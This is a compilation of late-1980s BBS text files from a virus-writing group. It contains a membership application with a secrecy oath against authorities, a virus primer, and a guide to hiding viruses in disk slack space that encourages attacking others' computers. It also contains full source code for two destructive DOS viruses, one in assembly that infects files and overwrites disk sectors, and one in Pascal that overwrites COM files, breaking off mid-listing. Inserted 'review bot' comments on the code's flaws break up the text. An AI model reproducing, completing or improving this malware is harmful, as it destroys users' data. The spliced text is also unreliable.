Please answer the following completely + and to the best of your ability. Also note that we may decide to voice + validate you or gather any other information through other sources and + will discover if you have placed false or misleading information on + this application. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your FULL REAL Name : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your Mailing Address : + Your City, State & Zip : + Your Age : + Occupation/Grade : + Place of Employment/School : + Work Phone Number : + Your Interests And Hobbies : + +Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) +: +: + +Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, +Data, Or Long Distance Type Of Company? If So, In What Way? +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Some Elite References : + Computers You Have Used : + Computer(s) You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Regularly : + Have You Ever Hacked : + Do You Hack Regularly : + Have You Ever Cracked : + Do You Crack Regularly : + Ever Made A Virus/Trojan : + Major Accomplishments : + : + +INTERVIEW +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? 
Can you name any or the founders of CPI? +: +: +: +: + +Have you considered the distribuition of Viruses/Trojans as a "crime"? Why +or why not? Have you ever considered the consequences that could result +from the acts of releasing a Virus/Trojan? (morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +What would you consider yourself if you were admitted into CPI, a programmer, +a phreaker, a distributor, a information gatherer, or a vegetable? +: +: +: +: + +Why would you ever want to release or aid in releasing a potential virus/trojan +to the public? +: +: +: +: + +Can you contribute to CPI? How? +:(do you have access to info concerning virus/trojans) +:(exceptional programmer?) +:(got connections?) +:(anything extraordinary?) + + +OATH +----------------------------------------------------------------------------- +Typing your name at the bottom of the following paragraph is the same as +signing your name on an official document. + +authorities - As stated in the document below, the term authorities shall + be defined as any law enforcement agency or any agency that + is/may be affiliated with any law enforcement agency. Also, + this includes any company or agency or person which is/may + be involved with the telephone company or any telephone-type + of service(s). + +I [your name here] do solemnly swear never to report neither to my peers nor +the authorities the actions and duties performed by this group, Corrupted +Programming International, on any account. Also, I realize that if I leave +CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold +the greatest confidence of CPI's activities, and I agree that any information I +may report to any one or any thing CANNOT be used against CPI and its members +in a court of law. 
I fully understand that if I were to become affiliated with +the authorities that it would be my duty to remove myself from any membership +if my position presented itself as contradictory towards the group, CPI and its +members. I also comprehend that if I were to be confronted by the authorities, +it my duty as a CPI member, as signed below, is to never disclose or discuss +CPI's activities to them; however, if I do, I fully agree that the information +disclosed or discussed cannot then be used against CPI or any member(s) of CPI +in a court of law. I further agree that all the terms and restrictions as noted +above also correspond to the entire group of WCCA, West Coast Corrupted +Allegiance. + +Typed:____________________ + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Upload ALL Applications To The WCCA Headquarters BBS + + T H E A N D R O M E D A S T R A I N + + * 619-566-7093 * 1200/2400 * 24 HRS * + + + _______________________<==| CURRENT WCCA NODES |==>_________________________ + /--------------+------------------------------------+-----------------+------\ + | Phone Number | Node Name | Sysop | Baud | + +--------------+------------------------------------+-----------------+------+ + | 619-484-3508 | The Phrozen Phorest | Ancient Mariner | 1200 | + \--------------+------------------------------------+-----------------+------/ + + Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.2] + Explanation of Viruses and Trojans Horses + ----------------------------------------- + Written by Acid Phreak + + Like it's biological counterpart, a computer virus is an agent of +infection, insinuating itself into a program or disk and forcing its host +to replicate the virus code. 
Hackers fascinated by the concept of "living" +code wrote the first viruses as projects or as pranks. In the past few +years, however, a different kind of virus has become common, one that lives +up to an earlier meaning of the word: in Latin, virus means poison. + These new viruses incorporate features of another type of insidious +program called a Trojan horse. Such a program masquerades as a useful +utility or product but wreaks havoc on your system when you run it. It may +erase a few files, format your disk, steal secrets--anything software can +do, a Trojan horse can do. A malicious virus can do all this then attempt +to replicate itself and infect other systems. + The growing media coverage of the virus conceptand of specific viruse +has promoted the development of a new type of software. Antivirus programs, +vaccines--they go by many names, but their purpose is to protect from virus +attack. At present there are more antivirus programs than known viruses +(not for long). + Some experts quibble about exactly what a virus is. The most widely +known viruses, the IBM Xmas virus and the recent Internet virus, are not +viruses according to some experts because they do not infect other programs. +Others argue that every Trojan horse is a virus--one that depends completely +on people to spread it. + +How They Reproduce: +------------------- + Viruses can't travel without people. Your PC will not become infected +unless someone runs an infected program on it, whether accidentally or on +purpose. PC's are different from mainframe networks in this way--the +mainframe Internet virus spread by transmitting itself to other systems and +ordering them to execute it as a program. That kind of active transmission +is not possible on a PC. + Virus code reproduces by changing something in your system. Some viruses +strike COMMAND.COM or the hidden system files. Others, like the notorious +Pakistani-Brain virus, modify the boot sector of floppy disks. 
Still others +attach themselves to any .COM or .EXE file. In truth, any file on your +system that can be executed--whether it's a program, a device driver, an +overlay, or even a batch file--could be the target of a virus. + When an infected program runs, the virus code usually executes first and +then transfers control to the original program. The virus may immediately +infect other programs, or it may load itself into RAM and continue spreading. +If the virus can infect a file that will be used on another system, it has +succeeded. + +What They Can Do: +----------------- + Viruses go through two phases: a replication phase and an action phase. +The action doesn't happen until a certain even occurs--perhaps reaching a +special date or running the virus a certain number of times. It wouldn't +make sense for a virus to damage your system the first time it ran; it needs +some time to grow and spread first. + The most vulnerable spot for a virus attack is your hard disk's file +allocation table (FAT). This table tells DOS where every file's data resides +on the disk. Without the FAT, the data's still there but DOS can't find it. +A virus could also preform a low-level format on some or all the tracks of +your hard disk, erase all files, or change the CMOS memory on AT-class +computers so that they don't recognize the hard disk. + Most of the dangers involve data only, but it's even possible to burn +out a monochrome monitor with the right code. + Some virus assaults are quite subtl. One known virus finds four +consecutive digits on the screen and switches two. Let's hope you're not +balancing the company's books when this one hits. Others slow down system +operations or introduce serious errors. 
+ +Downloaded From P-80 International Information Systems 304-744-2253 +[2.3] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + "We ain't the phucking Salvation Army." + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + "Ok, I've written the virus, now where the hell do I put it?" + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we "just say no" to doing it. +******************************************************************************* + + Ok, wow! You've just invented the most incredibly nifty virus. It +slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data! +But the only problem is, if you go around infecting every damn file, some cute +software company is going to start putting in procedures that checksum their +warez each time they run, which will make life for your infecting virus a total +bitch. Or somebody's going to come up with an incredibly nifty vaccination util +that will wipe it out. Because, i mean, hey, when disk space starts vanishing +suddenly in 500K chunks people tend to notice. 
Especially people like me that +rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying +"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need +to go around wasting your precious time when the answer is right there in front +of you! Think about it, you could be putting that time into writing better and +more inovative viruses, or you could be worring about keeping the file size, +the date & time, and the attributes the same. With this system, you only need +to infect one file, preferably one that's NOT a system file, but something that +will get run alot, and will be able to load your nifty virus on a daily basis. +This system also doesn't take up any disk space, other than the loader. And the +loader could conceivably be under 16 bytes (damn near undetectable). First of +all, you need to know what programs to infect. Now, everybody knows about using +COMMAND.COM and that's unoriginal anyway, when there are other programs people +run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or +WordPerfect; you get the idea. Better still are dos commands like Format, Link +or even compression utilities. But you get the point. Besides, who's going to +miss 16 bytes, right? Now, the good part: where to put the damn thing. One note +to the programmer: This could get tricky if your virus is over 2k or isn't +written in Assembly, but the size problem is easy enough, it would be a simple +thing to break your virus into parts and have the parts load each other into +the system so that you do eventually get the whole thing. The only problem with +using languages besides assembly is that it's hard to break them up into 2k +segments. If you want to infect floppys, or smaller disks, you'd be best off to +break your file into 512 byte segments, since they're easier to hide. But, hey, +in assembly, you can generate pretty small programs that do alot, tho. 
Ok, by +now you've probably figured out that we're talking about the part of the disk +called 'the slack'. Every disk that your computer uses is divided up into parts +called sectors, which are (in almost all cases) 512 bytes. But in larger disks, +and even in floppies, keeping track of every single sector would be a complete +bitch. So the sectors are bunched together into groups called 'clusters'. On +floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard +disks, they're typically 4096 bytes, or eight sectors. Now think about it, you +have programs on your hard disk, and what are the odds that they will have +sizes that always end up in increments of 4096? If I've lost you, think of it +this way: the file takes up a bunch of clusters, but in the last cluster it +uses, there is usually some 'slack', or space that isn't used by the file. This +space is between where the actual file ends and where the actual cluster ends. +So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard +disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton +program 'FS /S /T' command from your root directory, and subtract the total +size of the files from the total disk space used. That's how much 'slack' space +is on your disk (a hell of alot, even on a floppy). To use the slack, all you +need to do is to find a chunk of slack big enough to fit your virus (or a +segment of your virus) and use direct disk access (INT 13) to put your virus +there. There is one minor problem with this. Any disk write to that cluster +will overwrite the slack with 'garbage' from memory. This is because of the way +DOS manages it's disk I/O and it can't be fixed without alot of hassles. But, +there is a way around even this. And it involves a popular (abeit outdated and +usually ineffectual) form of virus protection called the READ-ONLY flag. This +flag is the greatest friend of this type of virus. 
Because if the file is not +written to, the last cluster is not written to, and voila! Your virus is safe +from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk +I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set + +because that has the same Read-only effect (even tho I haven't seen it written, +it's true that if the file is designated system, DOS treats it as read-only, +whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM +in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too +lazy to find out myself) or a protected (!) COMMAND.COM file in either type of +DOS would be ideal for this. All you have to do is then insert your loader into +some innocent-looking file, and you are in business. All your loader has to do +is read the sector into the highest part of memory, and do a far call to it. +Your virus cann then go about waiting for floppy disks to infect, and place +loaders on any available executable file on the disk. Sound pretty neet? It is! +Anyway, have fun, and be sure to upload your virus, along with a README file on +how it works to CPI Headquarters so we can check it out! And remember: don't +target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if +the Sysop is a leech and you want to shove his balls down his throat. Because +if all the PHP boards go down (especially members of CPI), who the hell can you +go to for all these nifty virus ideas? And besides, it's betraying your own +people, which is uncool even if you are an anarchist. So, target uncool PD +boards, or your boss's computer or whatever, but don't attack your friends. +Other than that, have phun, and phuck it up! + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applicaitons Network (SATAN) + Corrupted Programmers International (CPI) + + +PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). 
+ +Call these boards because the sysops are cool: +Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) +System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader) +The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) +D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) +The Jolly Bardsmen's Pub & Tavern +The Sierra Crib +The Phrozen Phorest +Knight Shadow's Grotto + +And if I forgot your board, sorry, but don't send me E-mail bitching about it! + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.4] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + "We ain't the phucking Salvation Army." + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + CPI Virus Standards - Protect yourself and your friends + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we "just say no" to doing it. +******************************************************************************* + + One of the main problems with viruses is that once you set one loose, +it is no longer under your control. 
I propose to stop this by introducing some +standards of virus writing that will enable them to be deactivated whenever +they enter a 'friendly' (CPI) system. In the long run, even the author of the +virus is not immune to being attacked. The following are what I have termed the +CPI standards for writing viruses. They will allow a virus to easily check any +system they are being run on for a type of 'identity badge'. If it is found, +the virus will not infect the system it is being run on. The other standards +are mostly written around this. + +CPI Standards for writing viruses - + + 1 - The virus will have an 'active period' and an 'inactive period'. + The active periods will be no more than one year in length (to make + it more difficult to discover the virus). You may release different + versions of your virus with different 'active periods'. It is not + recommended that your virus deactivate itself after the set active + period, as this would enable people to deactivate viruses by using + their computer with the date set to 2069 or something. It is also + required that activation periods begin on January 1 and end on + December 31. This will coincide with the changing identity codes. + + 2 - The virus will check for an identity code by executing Interrrupt + 12h with the following register settings: AX - 4350, BX - 4920, + CX - AB46, DX - 554E. If the system is friendly, then a pointer + will be returned in CX:DX to an ASCIIZ (0-terminated) string which + will have different contents in different years. The codes are not + to be included in any text file, and should only be given through + E-mail on CPI affiliated systems. You can always ask me by sending + me mail at The Andromeda Strain BBS. If a system is detected as + friendly, the virus will not attempt to infect or damage it, but it + is ok to display a little greeting message about how lucky the + user was. 
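Review bot: standard 2 never defines the negative case of the identity check, so as written it is ambiguous. INT 12h is the BIOS memory-size service; on a system with no CPI handler installed the stock handler only sets AX (size in KB) and leaves CX and DX exactly as the caller loaded them (AB46h:554Eh). The text says a pointer "will be returned in CX:DX" on a friendly system but not what a caller sees otherwise, so a program following it literally would treat AB46h:554Eh as a valid string pointer on every stock machine. The standard should state how a caller tells a friendly reply from an untouched register pair. Also "Interrrupt" is a typo.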
+ + 3 - We very much encourage you to upload your virus, along with a breif + description on the workings into the CPI section at The Andromeda + Strain BBS. Only CPI members will know about your virus. This is + so that CPI members can share techniques and it also allows us to + verify that the identity check works. If we see any improvements + that could be made, such as ways to streamline code, better ways of + spreading, etc. we will inform you so that you can make the changes + if you wish. + + 4 - It is also suggested that you use ADS standard for virus storage on + infected disks. This meathod uses disk slack space for storage and + is more thoroughly described in a previous text file by me. I think + that this is the most effective and invisible way to store viruli. + + 5 - A list of CPI-Standard viruli will be avaliable at all times from + The Andromeda Strain BBS, to CPI users. Identity strings will also + be available to anyone in CPI, or anyone who uploads source code to + a virus which is 100% complete except for the Identity string (it + must be written to CPI-Standards). Non-CPI members who do this will + be more seriously considered for membership in CPI. + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applications Network (SATAN) + Corrupted Programmers International (CPI) + +PS: This file (by itself) has approx 2.5k of slack. + +Downloaded From P-80 International Information Systems 304-744-2253 +;[2.5] +;============================================================================= +; +; C*P*I +; +; CORRUPTED PROGRAMMING INTERNATIONAL +; ----------------------------------- +; p r e s e n t s +; +; T H E +; _ _ +; (g) GENERIC VIRUS (g) +; ^ ^ +; +; +; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF +; CODE IN AND MAKES EACH A VIRUS. 
HOWEVER, WHEN IT MODIFIES EXE FILES, IT +; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO +; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. +; +; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON +; THE DISK. HAVE PHUN WITH THIS ONE. +; +; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE +; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. +; +; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE +; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF +; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR +; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. +; +; DOCTOR DISSECTOR +; CPI INNER CIRCLE +; +;============================================================================= + +MAIN: + NOP ;| Marker bytes that identify this program + NOP ;| as infected/a virus + NOP ;| + + MOV AX,00 ;| Initialize the pointers + MOV ES:[POINTER],AX ;| + MOV ES:[COUNTER],AX ;| + MOV ES:[DISKS B],AL ;| + + MOV AH,19 ;| Get the selected drive (dir?) + INT 21 ;| + + MOV CS:DRIVE,AL ;| Get current path (save drive) + MOV AH,47 ;| (dir?) + MOV DH,0 ;| + ADD AL,1 ;| + MOV DL,AL ;| (in actual drive) + LEA SI,CS:OLD_PATH ;| + INT 21 ;| + + MOV AH,0E ;| Find # of drives + MOV DL,0 ;| + INT 21 ;| + CMP AL,01 ;| (Check if only one drive) + JNZ HUPS3 ;| (If not one drive, go the HUPS3) + MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) + + HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive + LEA BX,SEARCH_ORDER ;| + ADD BX,AX ;| + ADD BX,0001 ;| + MOV CS:POINTER,BX ;| + CLC ;| + +CHANGE_DISK: ;| Carry is set if no more .COM files are + JNC NO_NAME_CHANGE ;| found. 
From here, .EXE files will be + MOV AH,17 ;| renamed to .COM (change .EXE to .COM) + LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program + INT 21 ;| to large to fit in memory" when starting + CMP AL,0FF ;| larger infected programs + JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) + + MOV AH,2CH ;| If neither .COM or .EXE files can be found, + INT 21 ;| then random sectors on the disk will be + MOV BX,CS:POINTER ;| overwritten depending on the system time + MOV AL,CS:[BX] ;| in milliseconds. This is the time of the + MOV BX,DX ;| complete "infection" of a storage medium. + MOV CX,2 ;| The virus can find nothing more to infect + MOV DH,0 ;| starts its destruction. + INT 26 ;| (write crap on disk) + +NO_NAME_CHANGE: ;| Check if the end of the search order table + MOV BX,CS:POINTER ;| has been reached. If so, end. + DEC BX ;| + MOV CS:POINTER,BX ;| + MOV DL,CS:[BX] ;| + CMP DL,0FF ;| + JNZ HUPS2 ;| + JMP HOPS ;| + +HUPS2: ;| Get a new drive from the search order table + MOV AH,0E ;| and select it, beginning with the ROOT dir. + INT 21 ;| (change drive) + MOV AH,3B ;| (change path) + LEA DX,PATH ;| + INT 21 ;| + JMP FIND_FIRST_FILE ;| + +FIND_FIRST_SUBDIR: ;| Starting from the root, search for the + MOV AH,17 ;| first subdir. First, (change .exe to .com) + LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the + INT 21 ;| old directory. + MOV AH,3B ;| (use root directory) + LEA DX,PATH ;| + INT 21 ;| + MOV AH,04E ;| (search for first subdirectory) + MOV CX,00010001B ;| (dir mask) + LEA DX,MASKE_DIR ;| + INT 21 ;| + JC CHANGE_DISK ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + DEC BX ;| + JZ USE_NEXT_SUBDIR ;| + +FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more + MOV AH,4FH ;| are found, the (search for next subdir) + INT 21 ;| drive will be changed. + JC CHANGE_DISK ;| + DEC BX ;| + JNZ FIND_NEXT_SUBDIR ;| + +USE_NEXT_SUBDIR: + MOV AH,2FH ;| Select found directory. 
(get dta address) + INT 21 ;| + ADD BX,1CH ;| + MOV ES:[BX],W"\" ;| (address of name in dta) + INC BX ;| + PUSH DS ;| + MOV AX,ES ;| + MOV DS,AX ;| + MOV DX,BX ;| + MOV AH,3B ;| (change path) + INT 21 ;| + POP DS ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + MOV CS:COUNTER,BX ;| + +FIND_FIRST_FILE: ;| Find first .COM file in the current dir. + MOV AH,04E ;| If there are none, (Search for first) + MOV CX,00000001B ;| search the next directory. (mask) + LEA DX,MASKE_COM ;| + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + JMP CHECK_IF_ILL ;| + +FIND_NEXT_FILE: ;| If program is ill (infected) then search + MOV AH,4FH ;| for another. (search for next) + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + +CHECK_IF_ILL: ;| Check if already infected by virus. + MOV AH,3D ;| (open channel) + MOV AL,02 ;| (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV BX,AX ;| (save channel) + MOV AH,3FH ;| (read file) + MOV CH,BUFLEN ;| + MOV DX,BUFFER ;| (write in buffer) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + MOV BX,CS:[BUFFER] ;| (look for three NOP's) + CMP BX,9090 ;| + JZ FIND_NEXT_FILE ;| + + MOV AH,43 ;| This section by-passes (write enable) + MOV AL,0 ;| the MS/PC DOS Write Protection. + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV AH,43 ;| + MOV AL,01 ;| + AND CX,11111110B ;| + INT 21 ;| + + MOV AH,3D ;| Open file for read/write (open channel) + MOV AL,02 ;| access (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + + MOV BX,AX ;| Read date entry of program and (channel) + MOV AH,57 ;| save for future use. (get date) + MOV AL,0 ;| + INT 21 ;| + PUSH CX ;| (save date) + PUSH DX ;| + + MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) + MOV CS:[JMPBUF],DX ;| the program will be saved for future use. + MOV DX,CS:[BUFFER+1] ;| (save new jump) + LEA CX,CONT-100 ;| + SUB DX,CX ;| + MOV CS:[CONTA],DX ;| + + MOV AH,57 ;| The virus now copies itself to (write date) + MOV AL,1 ;| to the start of the file. 
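Review bot: the comment beside MOV AH,57 / MOV AL,1 says "the virus now copies itself to the start of the file", but nothing in the listing writes to the host. Between the second open (AH=3Dh) and the close (AH=3Eh) the only calls are get date (57h/0) and set date (57h/1); there is no AH=40h write, so as printed the routine only rewrites the date stamp and patches CONTA in memory. Separately, the listing mixes suffixed and unsuffixed hex (MOV AH,2CH and BUFLEN EQU 208H beside INT 21, MOV AH,3D, CMP AL,0FF, CMP BX,9090): an assembler reads the unsuffixed forms as decimal, so INT 21 is INT 15h, and MOV CH,BUFLEN loads an 8-bit register with 208h. The header should say the listing is illustrative rather than assemblable, or the literals should be made consistent.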
+ POP DX ;| + POP CX ;| (restore date) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + + MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus + MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the + ;| start of the program. This is done to +HOPS: ;| preserve the executability of the host + NOP ;| program as much as possible. After saving, + CALL USE_OLD ;| it still works with the jump address in the + ;| virus. The jump address in the virus differs + ;| from the jump address in memory + +CONT DB 0E9 ;| Continue with the host program (make jump) +CONTA DW 0 ;| + MOV AH,00 ;| + INT 21 ;| + +USE_OLD: + MOV AH,0E ;| Reactivate the selected (use old drive) + MOV DL,CS:DRIVE ;| drive at the start of the program, and + INT 21 ;| reactivate the selected path at the start + MOV AH,3B ;| of the program.(use old drive) + LEA DX,OLD_PATH-1 ;| (get old path and backslash) + INT 21 ;| + RET ;| + +SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF + +POINTER DW 0000 ;| (pointer f. search order) +COUNTER DW 0000 ;| (counter f. nth. search) +DISKS DB 0 ;| (number of disks) +MASKE_COM DB "*.COM",00 ;| (search for com files) +MASKE_DIR DB "*",00 ;| (search for dir's) +MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB + DB 0,"????????EXE",0,0,0,0 + DB 0,"????????COM",0 +MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB + DB 0,"???????????",0,0,0,0 + DB 0,"????????COM",0 + +BUFFER EQU 0E00 ;| (a safe place) + +BUFLEN EQU 208H ;| Length of virus. Modify this accordingly + ;| if you modify this source. Be careful + ;| for this may change! + +JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) + +PATH DB "\",0 ;| (first place) +DRIVE DB 0 ;| (actual drive) +BACK_SLASH DB "\" +OLD_PATH DB 32 DUP (?) 
;| (old path) + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.6] + +-------------------------------+ +--------------------------------------+ + | | P | | + | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | + | @@ @@ @@ @@ | R | # # # # # # | + | @@ @@ @@ @@ | * | ##### # # # ##### | + | @@ @@@@@@@@ @@ | E | # # # # # # | + | @@ @@ @@ | * | # # ##### #### ##### | + | @@ @@ @@ | S | | + | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ + | | E | A NEW AND IMPROVED VIRUS FOR | + +-------------------------------+ * | PC/MS DOS MACHINES | + | C O R R U P T E D | N +--------------------------------------+ + | | * | CREATED BY: DOCTOR DISSECTOR | + | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| + | | * | AUTHOR NOT RESPONSIBLE FOR READERS | + | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| + +-------------------------------+ +--------------------------------------+ + + Well well, here it is... I call it AIDS... It infects all COM files, but it is + not perfect, so it will also change the date/time stamp to the current system. + Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them! + + Anyway, this virus was originally named NUMBER ONE, and I modified the code so + that it would fit my needs. The source code, which is included with this neato + package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works. + + Well, I added a few things, you can experiment or mess around with it if you'd + like to, and add any mods to it that you want, but change the name and give us + some credit if you do. + + The file is approximately 13k long, and this extra memory will be added to the + file it picks as host. 
If no more COM files are to be found, it picks a random + value from 1-10, and if it happens to be the lucky number 7, AIDS will present + a nice screen with lots of smiles, with a note telling the operator that their + system is now screwed, I mean permanantly. The files encrypted containing AIDS + in their code are IRREVERSIBLY messed up. Oh well... + + Again, neither CPI nor the author of Number One or AIDS endorses this document + and program for use in any illegal manner. Also, CPI, the author to Number One + and AIDS is not responsible for any actions by the readers that may prove harm + in any way or another. This package was written for EDUCATIONAL purposes only! + +{ Beginning of source code, Turbo Pascal 3.01a } +{C-} +{U-} +{I-} { Wont allow a user break, enable IO check } + +{ -- Constants --------------------------------------- } + +Const + VirusSize = 13847; { AIDS's code size } + + Warning :String[42] { Warning message } + = 'This File Has Been Infected By AIDS! HaHa!'; + +{ -- Type declarations------------------------------------- } + +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; + +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; + +{ -- Variables--------------------------------------------- } + +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : 
Integer; {Will loop forever} + +{ -- Program code------------------------------------------ } + +Begin + GetDir(0, UsePath); { get current directory } + if Pos('\', UsePath) <> UsePathLenght then + UsePath := UsePath + '\'; + UsePath := UsePath + '*.COM'; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B > 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID <> Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin + 